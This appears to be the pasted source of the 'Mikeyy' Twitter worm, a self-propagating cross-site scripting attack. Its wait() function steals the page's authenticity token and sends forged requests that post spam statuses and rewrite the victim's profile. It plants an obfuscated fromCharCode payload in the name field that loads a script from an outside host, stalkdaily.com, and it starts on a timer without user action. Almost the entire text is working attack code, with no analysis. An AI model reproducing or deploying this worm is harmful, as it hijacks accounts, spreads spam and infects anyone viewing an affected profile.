function XHConn() {
var xmlhttp, bComplete = false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {
try {
xmlhttp = new XMLHttpRequest();
}
catch (e) {
xmlhttp = false;
}
}
}
if (!xmlhttp) {
return null;
}
this.connect = function (sURL, sMethod, sVars, fnDone) {
if (!xmlhttp) {
return false;
}
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET") {
xmlhttp.open(sMethod, sURL + "?" + sVars, true);
sVars = "";
} else {
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
}
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && !bComplete) {
bComplete = true;
if (fnDone != null) {
fnDone(xmlhttp);
}
}
};
xmlhttp.send(sVars);
}
catch (z) {
return false;
}
return true;
};
return this;
}
function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});
return ret;
}
function wait()
{
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
var randomUpdate=new Array();
randomUpdate[0]="Twitter, freaking fix this already. >:[ - Mikeyy";
randomUpdate[1]="Twitter, your community is going to be mad at you... - Mikeyy";
randomUpdate[2]="This worm is getting out of hand Twitter. - Mikeyy";
randomUpdate[3]="RT!! 4th gen #Mikeyy worm on the loose! Click here to protect yourself: http://tinyurl.com/cojc6s";
randomUpdate[4]="This is all Twitters fault! Don't blame Mikeyy!!";
randomUpdate[5]="ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT: http://bit.ly/4ywBID";
randomUpdate[6]="How TO remove new Mikeyy worm! RT!! http://bit.ly/yCL1s";
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
var updateEncode = urlencode(genRand);
var randomXSS=new Array();
randomXSS[0] = '"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>';
var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
var xss = urlencode(genXSS);
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
var ajaxConn2 = new XHConn();
ajaxConn2.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&commit=save changes");
var ajaxConn3 = new XHConn();
ajaxConn3.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected]=0&commit=Save");
var ajaxConn4 = new XHConn();
ajaxConn4.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[name]="+xss+"&commit=save changes");
var ajaxConn5 = new XHConn();
ajaxConn5.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
}
setTimeout("wait()",3550);
Pastie << self Blog
